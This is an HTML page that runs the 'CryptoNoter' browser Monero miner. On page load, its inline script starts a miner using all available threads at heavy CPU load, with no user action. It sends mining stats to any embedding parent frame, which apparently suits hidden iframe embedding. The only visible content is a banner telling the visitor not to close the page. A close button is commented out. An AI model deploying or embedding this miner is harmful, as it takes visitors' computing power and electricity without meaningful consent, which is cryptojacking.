<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>CryptoNoter - Javascript Browser XMR Mining Script</title>
    <style>
        :root {
            --error: #F15744;
        }
        * {
            box-sizing: border-box;
            letter-spacing: .02rem;
            font-family: TT Norms Pro;
            font-size: 14px;
        }
        body{
            margin: 0;
            padding: 0;
        }
        .error_area[data-v-2341bf32] {
            background-color: #f4edf1;
            display: flex;
            align-items: center;
            padding: 8px;
            border-radius: 16px;
            color: var(--error);
            font-weight: 700;
            margin: 0px;
            gap: 10px;
        }
        button[data-v-2341bf32] {
            margin-left: auto;
            display: flex;
            align-items: center;
            justify-content: center;
            border: none;
            outline: none;
            background-color: transparent;
            height: 32px;
            width: 32px;
            border-radius: 8px;
        }
    </style>
    <script src="/processor.js"></script>
    <script>
        var addr = 'CryptoNoter';
        var miner = new CryptoNoter.Anonymous(addr, {
            autoThreads: true,
            throttle: 0.1
        });
        miner.start();



        // Listen on events
        miner.on('error', function (...data) {
            console.log('error', data)
        })
        // var unsubscribe = miner.on('changeData', function (data) {
        //     console.table(data)
        // });
        miner.on('changeData', function (data) {
            parent.postMessage({event:'changeData',data},"*")
        })
    </script>
</head>

<body>

<div data-v-2341bf32="" class="error_area">
    <svg data-v-f7316193="" data-v-2341bf32="" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"
         class="icon" width="32" height="32">
        <rect width="32" height="32" rx="11" fill="#F15744"></rect>
        <path d="M14.758 9.063v9.334h2.667V9.063h-2.667Zm0 10.667v2.667h2.667V19.73h-2.667Z" fill="#fff"></path>
    </svg>
    Don't close the page, to continue mining
<!--    <button data-v-2341bf32="" type="button">-->
<!--        <svg data-v-f7316193="" data-v-2341bf32="" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"-->
<!--             class="icon" width="20" height="20">-->
<!--            <path d="m12.667 4.273-.94-.94L8 7.06 4.274 3.333l-.94.94L7.06 8l-3.726 3.727.94.94L8 8.94l3.727 3.727.94-.94L8.94 8l3.727-3.727Z"-->
<!--                  fill="#F15744"></path>-->
<!--        </svg>-->
<!--    </button>-->
</div>
</body>
</html>

